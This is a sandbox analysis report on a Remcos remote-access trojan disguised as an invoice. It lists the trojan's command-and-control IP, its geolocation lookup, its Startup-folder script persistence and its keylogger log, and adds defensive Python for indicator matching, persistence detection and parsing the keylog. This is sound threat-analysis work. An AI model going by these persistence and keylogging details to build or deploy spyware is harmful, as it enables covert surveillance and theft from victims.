http://www.imvu.coma | 0% | Avira URL Cloud | safe
Contacted domains
Name | IP | Active | Malicious | Antivirus detection | Reputation
geoplugin.net | 178.237.33.50 | true | false | (none) | high

Contacted URLs
Name | Malicious | Antivirus detection | Reputation
http://geoplugin.net/json.gp | false | (none) | high
URLs found in memory dumps and dropped files
Name | Source | Malicious | Antivirus detection | Reputation

http://geoplugin.net/json.gp$ | turbinals.exe 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp; turbinals.exe 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp; turbinals.exe 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp; turbinals.exe 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://www.office.com/ | bhv7BD7.tmp.5.dr | false | (none) | high
http://www.imvu.comr | turbinals.exe 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp; turbinals.exe 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
https://aefd.nelreports.net/api/report?cat=bingth | bhv7BD7.tmp.5.dr | false | (none) | high
https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab00454191 | bhv7BD7.tmp.5.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.com | turbinals.exe 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp; turbinals.exe 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp; turbinals.exe 00000007.00000002.1371634572.000000000173D000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
https://aefd.nelreports.net/api/report?cat=wsb | bhv7BD7.tmp.5.dr | false | (none) | high
http://www.imvu.coma | turbinals.exe 00000007.00000002.1371634572.000000000173D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | turbinals.exe 00000005.00000002.1381486653.0000000000BF3000.00000004.00000010.00020000.00000000.sdmp | false | (none) | high
https://aefd.nelreports.net/api/report?cat=bingaotak | bhv7BD7.tmp.5.dr | false | (none) | high
https://deff.nelreports.net/api/report?cat=msn | bhv7BD7.tmp.5.dr | false | (none) | high
http://geoplugin.net/json.gpl6 | turbinals.exe 00000003.00000002.3758634982.0000000001520000.00000004.00000020.00020000.00000000.sdmp; turbinals.exe 00000003.00000003.1364321509.0000000001520000.00000004.00000020.00020000.00000000.sdmp; turbinals.exe 00000003.00000003.1364486252.0000000001520000.00000004.00000020.00020000.00000000.sdmp; turbinals.exe 00000003.00000003.1384020768.0000000001520000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://geoplugin.net/json.gpSystem32 | turbinals.exe 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp | false | (none) | high
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | turbinals.exe 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp; turbinals.exe 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
https://www.google.com | turbinals.exe 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp; turbinals.exe 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5b&FrontEnd=AF | bhv7BD7.tmp.5.dr | false | (none) | high
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL | bhv7BD7.tmp.5.dr | false | (none) | high
https://aefd.nelreports.net/api/report?cat=bingaot | bhv7BD7.tmp.5.dr | false | (none) | high
http://geoplugin.net/json.gp/C | turbinals.exe 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp; turbinals.exe 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp; turbinals.exe 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp; turbinals.exe 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp; turbinals.exe 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp; turbinals.exe 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp; turbinals.exe 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp; turbinals.exe 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp | false | (none) | high
https://maps.windows.com/windows-app-web-link | bhv7BD7.tmp.5.dr | false | (none) | high
https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdc | bhv7BD7.tmp.5.dr | false | Avira URL Cloud: safe | unknown
https://aefd.nelreports.net/api/report?cat=bingrms | bhv7BD7.tmp.5.dr | false | (none) | high
http://www.nirsoft.net/ | turbinals.exe 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high
http://www.ebuddy.com | turbinals.exe 00000003.00000002.3761803858.00000000050E0000.00000040.10000000.00040000.00000000.sdmp; turbinals.exe 00000007.00000002.1371186223.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | (none) | high

None of these URLs was contacted during the run; the only contacted URL is http://geoplugin.net/json.gp (table above). The trailing characters on several entries (json.gp$, json.gpl6, imvu.comr, imvu.coma) are string-carving artefacts of the memory dump scan, not distinct URLs.
Contacted IPs
IP | Domain | Country | ASN | ASN name | Malicious
192.210.150.26 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
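The two contacted endpoints above are the whole network footprint of this run, and they carry very different weight. The code below is an added example (not Joe Sandbox output) that turns them into matching logic over a constructed flow log: the log format, the monitored-host addresses (10.0.0.x) and the timestamps are assumptions, while the indicator values are the ones reported. The point it encodes is the caveat the reputation column already hints at: geoplugin.net is a legitimate geolocation API that Remcos queries at check-in, so on its own it is a low-severity indicator; only the C2 endpoint 192.210.150.26:8787 justifies a high-severity alert, and a geoplugin lookup from a host that also reached the C2 is escalated because that pairing is the check-in sequence seen here.

```python
"""Match this report's network indicators against a connection log.

Added example, not Joe Sandbox output. The log format is a constructed,
simplified flow/HTTP record, one per line:
  <timestamp> <src_ip>:<src_port> -> <dst_ip>:<dst_port> <proto> [host=<h> uri=<u>]
Monitored-host addresses (10.0.0.x) are assumptions; indicator values are from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Indicators from the report: the Remcos C2 (ASN 36352, ColoCrossing) and the
# geolocation API Remcos queries at check-in.
C2_ENDPOINTS = {("192.210.150.26", 8787)}
GEO_HOSTS = {"geoplugin.net"}
GEO_IPS = {"178.237.33.50"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<proto>\w+)"
    r"(?:\s+host=(?P<host>\S+)\s+uri=(?P<uri>\S+))?\s*$"
)

# Constructed sample log: host 10.0.0.7 shows the full Remcos check-in (C2 contact on
# the ephemeral ports seen in the report, then the geolocation lookup); host 10.0.0.9
# only performs a geolocation lookup and an unrelated HTTPS request.
SAMPLE_LOG = """\
2024-12-03T14:40:05Z 10.0.0.7:49703 -> 192.210.150.26:8787 tcp
2024-12-03T14:40:06Z 10.0.0.7:49704 -> 192.210.150.26:8787 tcp
2024-12-03T14:40:12Z 10.0.0.7:49710 -> 178.237.33.50:80 tcp host=geoplugin.net uri=/json.gp
2024-12-03T14:41:00Z 10.0.0.9:51002 -> 178.237.33.50:80 tcp host=geoplugin.net uri=/json.gp
2024-12-03T14:41:30Z 10.0.0.9:51003 -> 203.0.113.5:443 tcp host=example.invalid uri=/
""".splitlines()


@dataclass
class Finding:
    ts: str
    src: str
    indicator: str
    severity: str  # "high": C2 contact; "low": geoplugin alone; "medium": geoplugin from a host that also hit the C2


def parse_line(line: str) -> Optional[dict]:
    """Parse one constructed log record; None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def match_iocs(lines) -> List[Finding]:
    findings: List[Finding] = []
    severities_by_host: Dict[str, Set[str]] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if (rec["dst"], rec["dport"]) in C2_ENDPOINTS:
            f = Finding(rec["ts"], rec["src"], "remcos-c2 %s:%d" % (rec["dst"], rec["dport"]), "high")
        elif rec["host"] in GEO_HOSTS or rec["dst"] in GEO_IPS:
            # geoplugin.net is a legitimate service (reputation "high" in the report);
            # by itself it is weak evidence.
            f = Finding(rec["ts"], rec["src"], "geoplugin-lookup %s" % (rec["uri"] or ""), "low")
        else:
            continue
        findings.append(f)
        severities_by_host.setdefault(f.src, set()).add(f.severity)
    # Escalate a geolocation lookup when the same host also talked to the C2.
    for f in findings:
        if f.severity == "low" and "high" in severities_by_host.get(f.src, set()):
            f.severity = "medium"
    return findings


if __name__ == "__main__":
    for finding in match_iocs(SAMPLE_LOG):
        print(finding)
```

Run stand-alone, the script reports two high-severity C2 findings and one medium-severity geoplugin lookup for 10.0.0.7, and a single low-severity lookup for 10.0.0.9, which is the triage outcome a practitioner wants: the second host deserves a look, not an incident.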
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1567452
Start date and time: 2024-12-03 15:39:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 17s
Hypervisor based inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis mode: default
Analysis stop reason: Timeout
Sample name: z49FACTURA-0987678.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winEXE@20/14@1/2
EGA information:
• Successful, ratio: 100%
HCA information:
• Successful, ratio: 100%
• Number of executed functions: 54
• Number of non-executed functions: 284
Cookbook comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing behavior information
• Report size exceeded the maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Report size getting too big: too many NtReadVirtualMemory calls found
• VT rate limit hit for: z49FACTURA-0987678.exe
Timeline
Time | Type | Description
09:40:43 | API Interceptor | 6294266x Sleep call for process: turbinals.exe modified
15:40:13 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs
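The Autostart entry above and the wscript.exe branch of the behavior graph describe the persistence chain: turbinals.exe writes turbinals.vbs into the user's Startup folder, and at the next logon wscript.exe runs that script, which relaunches turbinals.exe from AppData\Local. The following is an added example, not a Joe Sandbox or Sigma artefact, that encodes those three observable steps as detection rules and runs them over constructed Sysmon-style events. The event dictionaries, their field names and the benign events are assumptions; the malicious paths are the ones the report lists.

```python
"""Detection logic for the persistence chain in this report, run over constructed events.

Added example, not a Joe Sandbox or Sigma artefact. Events are dictionaries in a
Sysmon-like shape (type, image, target, cmdline, parent_image); the field names and
the benign events are assumptions, the malicious paths are the ones the report lists.
"""
from pathlib import PureWindowsPath

STARTUP_MARK = "\\microsoft\\windows\\start menu\\programs\\startup\\"
SCRIPT_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = ("\\appdata\\local\\", "\\appdata\\roaming\\", "\\users\\public\\", "\\programdata\\")


def in_startup(path: str) -> bool:
    return STARTUP_MARK in path.lower()


def is_script(path: str) -> bool:
    return PureWindowsPath(path).suffix.lower() in SCRIPT_EXT


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def under_user_writable(path: str) -> bool:
    return any(mark in path.lower() for mark in USER_WRITABLE)


# Rule 1: a script written into the Startup folder by a binary that itself runs from a
# user-writable directory (turbinals.exe -> Startup\turbinals.vbs).
def rule_startup_script_drop(ev) -> bool:
    return (ev["type"] == "file_create"
            and in_startup(ev["target"])
            and is_script(ev["target"])
            and under_user_writable(ev["image"]))


# Rule 2: wscript/cscript started with a script that lives in the Startup folder.
def rule_wsh_runs_startup_script(ev) -> bool:
    return (ev["type"] == "process_create"
            and basename(ev["image"]) in SCRIPT_HOSTS
            and in_startup(ev.get("cmdline", "")))


# Rule 3: a script host spawning an .exe from a user-writable directory
# (wscript.exe -> turbinals.exe), the second stage the behavior graph shows.
def rule_wsh_spawns_user_writable_exe(ev) -> bool:
    return (ev["type"] == "process_create"
            and basename(ev.get("parent_image", "")) in SCRIPT_HOSTS
            and under_user_writable(ev["image"])
            and PureWindowsPath(ev["image"]).suffix.lower() == ".exe")


RULES = [
    ("startup_script_drop", rule_startup_script_drop),
    ("wsh_runs_startup_script", rule_wsh_runs_startup_script),
    ("wsh_spawns_user_writable_exe", rule_wsh_spawns_user_writable_exe),
]


def evaluate(events):
    """Return (rule name, offending image) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev["image"]))
    return hits


# Constructed events. Paths of the malicious files are those the report lists; the
# benign noise (an Explorer-created shortcut, a vendor script under cscript) is assumed.
STARTUP = "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"
TURBINALS = "C:\\Users\\user\\AppData\\Local\\acceptancy\\turbinals.exe"
WSCRIPT = "C:\\Windows\\System32\\wscript.exe"

SAMPLE_EVENTS = [
    {"type": "file_create", "image": TURBINALS, "target": STARTUP + "turbinals.vbs"},
    {"type": "process_create", "image": WSCRIPT, "parent_image": "C:\\Windows\\explorer.exe",
     "cmdline": '"%s" "%sturbinals.vbs"' % (WSCRIPT, STARTUP)},
    {"type": "process_create", "image": TURBINALS, "parent_image": WSCRIPT, "cmdline": '"%s"' % TURBINALS},
    {"type": "file_create", "image": "C:\\Windows\\explorer.exe", "target": STARTUP + "OneNote.lnk"},
    {"type": "process_create", "image": "C:\\Windows\\System32\\cscript.exe",
     "parent_image": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": '"C:\\Windows\\System32\\cscript.exe" "C:\\Program Files\\Vendor\\check.vbs"'},
]

if __name__ == "__main__":
    for name, image in evaluate(SAMPLE_EVENTS):
        print(name, "<-", image)
```

Each rule fires on a different stage, so a single .vbs in Startup placed by an installer (rule 1 only, and only if the installer ran from a user-writable path) looks different from the full chain here, where all three fire in sequence for the same binary.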
Context: IPs
Match | Associated sample name / URL | Detection | Threat name | Context
192.210.150.26 | FAT6789098700900.scr.exe | malicious | Remcos |
192.210.150.26 | Rgh99876k7e.exe | malicious | Remcos |
192.210.150.26 | SALKI098765R400.exe | malicious | Remcos |
192.210.150.26 | FTE98767800000.bat.exe | malicious | Remcos |
178.237.33.50 | LBzGgy6rnu.doc | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | EIuz8Bk9kGav2ix.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 0200011080.xls | malicious | Remcos, HTMLPhisher | geoplugin.net/json.gp
178.237.33.50 | 1099833039444.pdf.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | RFQ-24-10104-PO X241104754-007.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | FAT6789098700900.scr.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | INTECH RFQ EN241813.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs | malicious | GuLoader, Remcos | geoplugin.net/json.gp

Context: domains
Match | Associated sample name / URL | Detection | Threat name | Context
geoplugin.net | LBzGgy6rnu.doc | malicious | Remcos | 178.237.33.50
geoplugin.net | EIuz8Bk9kGav2ix.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 0200011080.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
geoplugin.net | 1099833039444.pdf.js | malicious | Remcos | 178.237.33.50
geoplugin.net | RFQ-24-10104-PO X241104754-007.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | FAT6789098700900.scr.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | INTECH RFQ EN241813.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs | malicious | GuLoader, Remcos | 178.237.33.50

Context: ASNs
Match | Associated sample name / URL | Detection | Threat name | Context
AS-COLOCROSSINGUS | EIuz8Bk9kGav2ix.exe | malicious | Remcos | 192.3.64.152
AS-COLOCROSSINGUS | a-r.m-6.SNOOPY.elf | malicious | Gafgyt | 192.3.179.33
AS-COLOCROSSINGUS | FAT6789098700900.scr.exe | malicious | Remcos | 192.210.150.26
AS-COLOCROSSINGUS | INTECH RFQ EN241813.exe | malicious | Remcos | 104.168.7.16
AS-COLOCROSSINGUS | https://a.rs6.net/1/pc?ep=e4f2f4ad2c30fbb2SK2ZyQxbsE02cV3UOfuPD-JxSRgUD6Y86mFtUF3WRqjeuMrz9o3Xbb320wCTDsWWUHuFG0qWroCiniptiREBdHyyzdrPc45m6t-HBEB7SZ8gZX4dYr4o80JwDUJz1eSGQlrcb9as_P_3jZu-t-DrRTdQARm9vPjp5IAqdyzm4bLxpaVnP8_0eRiLoUggvzge&c=$%7bContact.encryptedContactId%7d | malicious | HTMLPhisher | 206.217.129.92
AS-COLOCROSSINGUS | seemebestgoodluckthings.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 172.245.123.12
AS-COLOCROSSINGUS | PI-02911202409#.xla.xlsx | malicious | FormBook, HTMLPhisher | 172.245.123.12
AS-COLOCROSSINGUS | la.bot.mips.elf | malicious | Mirai | 107.175.186.126
AS-COLOCROSSINGUS | m68k.elf | malicious | Mirai, Moobot | 107.174.8.80
AS-COLOCROSSINGUS | bot.x86_64.elf | malicious | Mirai, Okiru | 107.175.32.137
ATOM86-ASATOM86NL | LBzGgy6rnu.doc | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | EIuz8Bk9kGav2ix.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 0200011080.xls | malicious | Remcos, HTMLPhisher | 178.237.33.50
ATOM86-ASATOM86NL | 1099833039444.pdf.js | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | RFQ-24-10104-PO X241104754-007.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | FAT6789098700900.scr.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | ISF (TWN24110458 - Invoice & Packing List PO POUS120000241, POUS120000771.scr.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 173317191746333e83fd715fcd29456f316941f504021238a7f0f8ba4a89827b03f83d6aba395.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | INTECH RFQ EN241813.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | doc02122024782020031808174KR1802122024_po_doc_00000(991KB).vbs | malicious | GuLoader, Remcos | 178.237.33.50

The 192.210.150.26 matches are all Remcos; the geoplugin.net and ATOM86 matches are every recent Remcos (and GuLoader-delivered Remcos) sample that performed the same geolocation lookup, which is why that domain is useful for clustering Remcos runs but not as a malicious indicator on its own.
                                                                          No context
                                                                          No context
Dropped file: C:\ProgramData\remcos\logs.dat
Process: C:\Users\user\AppData\Local\acceptancy\turbinals.exe
File type: data
Category: dropped
Size (bytes): 292
Entropy (8bit): 3.4230866799314166
Encrypted: false
SSDEEP: 6:6lZMj5YcIeeDAlOWA41gWA7DxbN2fxlBgWMm0v:6lSec0WIWItN2LBgWMl
MD5: 7B2EF1EF2433E0342990F5D389BEED17
SHA1: 13477943853B94360C3A00967B0DED6A4B06D0D8
SHA-256: FFE35A7D58E8FB9EB785DD4C144EF6B38732330CDBDF734B2B136759D12326F6
SHA-512: 8225C627FD0DBE758323F7C334A6A0FA071D326AD4EBC8DBC995E6645A8A60C58202E66CD4FD08393D6479DB42D34C1C4365D51BEF649251459489C91709137D
Malicious: true
Yara hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation: low
Preview: ....[.2.0.2.4./.1.2./.0.3. .0.9.:.4.0.:.1.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.1.2.7.2. .m.i.n.u.t.e.s. .}.....
Preview decoded (the file is UTF-16LE text; the dots are the high zero bytes of each character and the line separators): [2024/12/03 09:40:11 Offline Keylogger Started] [Program Manager] [Run] [Program Manager] { User has been idle for 71272 minutes }
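logs.dat is the Remcos offline keylogger log, and the preview shows its layout: a timestamped start marker, the title of each foreground window in square brackets (keystrokes typed into that window follow its title), and an idle-time status in braces. The parser below is an added example rather than tooling from the report. Its input is the decoded preview re-encoded as UTF-16LE with a byte-order mark; the CRLF separators are an assumption, since the preview only renders them as dots.

```python
"""Parse a Remcos offline keylogger log (logs.dat) into window/keystroke events.

Added example, not part of the report. The file is UTF-16LE text; this parser
assumes CRLF line endings, which the preview only shows as dots.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional

# Constructed input: the decoded preview above, re-encoded like the original file
# (BOM first; separators assumed to be CRLF).
SAMPLE_LOGS_DAT = (
    "\ufeff\r\n"
    "[2024/12/03 09:40:11 Offline Keylogger Started]\r\n\r\n"
    "[Program Manager]\r\n\r\n"
    "[Run]\r\n\r\n"
    "[Program Manager]\r\n\r\n"
    "{ User has been idle for 71272 minutes }\r\n"
).encode("utf-16-le")

# A bracketed entry is either a window title or a timestamped marker; a braced entry is
# a status line. Titles containing ']' would need a smarter tokenizer than this.
ENTRY_RE = re.compile(r"\[(?P<bracket>[^\]]*)\]|\{(?P<brace>[^}]*)\}")
STAMP_RE = re.compile(r"^(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) (.*)$")
IDLE_RE = re.compile(r"idle for (\d+) minutes")


@dataclass
class Event:
    kind: str  # "marker", "window", "keys" or "status"
    text: str
    ts: Optional[datetime] = None


def decode_logs_dat(data: bytes) -> str:
    """Strip the BOM and decode; errors='replace' keeps a truncated log readable."""
    if data.startswith(b"\xff\xfe"):
        data = data[2:]
    return data.decode("utf-16-le", errors="replace")


def parse_entries(text: str) -> List[Event]:
    events: List[Event] = []
    pos = 0
    for m in ENTRY_RE.finditer(text):
        # Free text between two entries is what was typed into the preceding window.
        gap = text[pos:m.start()].strip()
        if gap:
            events.append(Event("keys", gap))
        pos = m.end()
        if m.group("brace") is not None:
            events.append(Event("status", m.group("brace").strip()))
            continue
        body = m.group("bracket")
        stamp = STAMP_RE.match(body)
        if stamp:
            ts = datetime.strptime(stamp.group(1), "%Y/%m/%d %H:%M:%S")
            events.append(Event("marker", stamp.group(2), ts))
        else:
            events.append(Event("window", body))
    tail = text[pos:].strip()
    if tail:
        events.append(Event("keys", tail))
    return events


def windows_seen(events: List[Event]) -> List[str]:
    return [ev.text for ev in events if ev.kind == "window"]


def idle_minutes(events: List[Event]) -> Optional[int]:
    """Most recent idle-time status, if the log carries one."""
    for ev in reversed(events):
        if ev.kind == "status":
            m = IDLE_RE.search(ev.text)
            if m:
                return int(m.group(1))
    return None


if __name__ == "__main__":
    for ev in parse_entries(decode_logs_dat(SAMPLE_LOGS_DAT)):
        print(ev)
```

On this sample the log holds no keystrokes at all, only window changes and an idle marker: the sandbox user never typed, which is consistent with a ten-minute automated run. A log recovered from a real victim host carries typed text between the window titles, and `parse_entries` returns it as `keys` events attached in order to the window that received them.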
Dropped file: geoplugin.net response (JSON)
Process: C:\Users\user\AppData\Local\acceptancy\turbinals.exe
File type: JSON data
Category: dropped
Size (bytes): 963
Entropy (8bit): 5.014904284428935
Encrypted: false
SSDEEP: 12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5: B66CFB6461E507BB577CDE91F270844E
SHA1: 6D952DE48032731679F8718D1F1C3F08202507C3
SHA-256: E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
SHA-512: B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
Malicious: false
Reputation: moderate, very likely benign file
Preview:
{
  "geoplugin_request":"8.46.123.228",
  "geoplugin_status":200,
  "geoplugin_delay":"1ms",
  "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",
  "geoplugin_city":"New York",
  "geoplugin_region":"New York",
  "geoplugin_regionCode":"NY",
  "geoplugin_regionName":"New York",
  "geoplugin_areaCode":"",
  "geoplugin_dmaCode":"501",
  "geoplugin_countryCode":"US",
  "geoplugin_countryName":"United States",
  "geoplugin_inEU":0,
  "geoplugin_euVATrate":false,
  "geoplugin_continentCode":"NA",
  "geoplugin_continentName":"North America",
  "geoplugin_latitude":"40.7123",
  "geoplugin_longitude":"-74.0068",
  "geoplugin_locationAccuracyRadius":"20",
  "geoplugin_timezone":"America\/New_York",
  "geoplugin_currencyCode":"USD",
  "geoplugin_currencySymbol":"$",
  "geoplugin_currencySymbol_UTF8":"$",
  "geoplugin_currencyConverter":0
}
The geoplugin_request value is the sandbox's egress address as seen by the API; Remcos stores the response so the operator sees the victim's country and city.
Dropped file: encrypted payload container
Process: C:\Users\user\Desktop\z49FACTURA-0987678.exe
File type: data
Category: dropped
Size (bytes): 423920
Entropy (8bit): 7.985721489448969
Encrypted: false
SSDEEP: 12288:m0mJL7t81uJw6rSocqtehC7lYi6/MDFsc9XZ:mLtJw6LcDhC7lYiXXRZ
MD5: FBBAB074EA1BC72A76E7E17D4546F64A
SHA1: B7E164E3BD18C016F162808550B250EDDC9CCD46
SHA-256: 64ADDCBF4C12AF13CC30A75208952AB12B2A66CCEC42DD6D65297BD067733E54
SHA-512: D4C3DCD1DDCB9D5BA519F71C49A4F63D72554930174F0C727A7F6D6CFA6E50ED3142DB7C84F666646FF45914A6A46F1A545577DFFAC6AD405BBDB206C41B8483
Malicious: false
Reputation: low
                                                                          Preview:EA06.....X..Z}..W.T.W:.0.T.U9..kL.....2.1.L)..y....s.m..Y..iU......T.....%.^..).W4.[*r..ryM.U.6.D..s...X...>...i...~.L..3...~.~6........W.......-....W.x=...o.|.9^?..o.`....eI..a...n...uoX.wJ+......&.......&..s....,^.A..n.v....q.................-u......q.4u....7I.&.1.E&....T.s..6.J..*.J..f..Z`S..2...H. ..2aH......2.Z..h.Jd..w.Z]..S...:aH..r.......(..(`*..iS.eH..L..x........*....T.@1.6..>......Z.Y....UR.i..9.lrO\.P@..U...1.EZeS...|6...g..Te......Uf3."...Ng..H.g.r..o..D.]6..&...6.2......p.G..&..,.IB..... ..R.Ng...#S6......\j.B.J&.i.3as..13..2...F.`.?..ar........UJ.~.w`.Z.^...G*...b.S..0..D......tI.....h%.............aV..d..$Ze..D&..f{p...5i.W'.]j..M.Iq.....l.!1.],...+.R..~`.,"..rt..X....[`u..R.0.N.....Z..j.....k.S;.z..Q.Va4..^1P.@2.f&Am...3.-2.2..".M..-O.Dr.....5.q8.i..4.r<V..,...Fz...H...F.>..l-..F....K...G....pm@.GV...G...Gf.......F....t...9b.y.r$.@.B*......3..9...&....@..P..9...&.........9.....W.ri`.WggO.T.R...k.._j..V.cy.S&..m~-9.s.T..;.9.x<..\.AQ..
                                                                          Process:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):423920
                                                                          Entropy (8bit):7.985721489448969
                                                                          Encrypted:false
